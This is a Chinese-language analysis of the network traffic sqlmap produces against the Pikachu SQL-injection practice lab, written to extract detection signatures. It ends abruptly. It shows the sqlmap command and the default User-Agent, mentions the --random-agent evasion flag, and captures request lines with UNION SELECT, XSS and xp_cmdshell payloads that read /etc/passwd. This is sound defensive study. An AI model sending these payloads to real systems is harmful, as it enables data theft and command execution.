http://192.168.68.78/pikachu/vul/sqli/sqli_str.php #pikachu靶场地址
PS:由于Sqlmap工具产生流量过多,文章仅就关键流量进行分析
sql注入抓包样本:
1.首先当我们当使用sqlmap默认命令
sqlmap -u "http://192.168.68.78/pikachu/vul/sqli/sqli_str.php?name=admin&submit=%E6%9F%A5%E8%AF%A2"
提交请求时默认的UserAgent为:sqlmap/1.5.8#stable (http://sqlmap.org)这样很容易暴露。
GET /pikachu/vul/sqli/sqli_str.php?name=admin&submit=查询 HTTP/1.1
CACHE-CONTROL: no-cache
CONNECTION: close
USER-AGENT: sqlmap/1.5.8#stable (http://sqlmap.org)
ACCEPT: */*
HOST: 192.168.68.78
ACCEPT-ENCODING: gzip,deflate
一般黑客会在sqlmap添加--random-agent参数,来避免被发现。
可根据上述流量提取攻击特征:
- 若攻击者使用sqlmap不添加--random-agent参数,则可通过捕获请求包的USER-AGENT字段来判断攻击者是否在使用sqlmap进行攻击
2.Sqlmap在进行初始监测时会进行一些预检测
GET /pikachu/vul/sqli/sqli_str.php?name=root&submit=查询&teEu=1187 AND 1=1 UNION ALL
SELECT 1,NULL,'<script>alert("XSS")</script>',table_name
FROM information_schema.tables WHERE 2>1--/**/; EXEC
xp_cmdshell('cat ../../../etc/passwd')# HTTP/1.1#判断数据库类型和xss语句
GET /pikachu/vul/sqli/sqli_str.php?name=root&submit=查询 HTTP/1.1
GET /pikachu/vul/sqli/sqli_str.php?name=4767&submit=查询 HTTP/1.1
GET /pikachu/vul/sqli/sqli_str.php?name=root(,.,,.)."'&submit=查询 HTTP/1.1
GET /pikachu/vul/sqli/sqli_str.php?name=root'fYzJCd<'">QtldwA&submit=
查询 HTTP/1.1
GET /pikachu/vul/sqli/sqli_str.php?name=root')
AND 4676=7206 AND ('OEeA'='OEeA&submit=查询 HTTP/1.1
可根据上述流量提取攻击特征:
|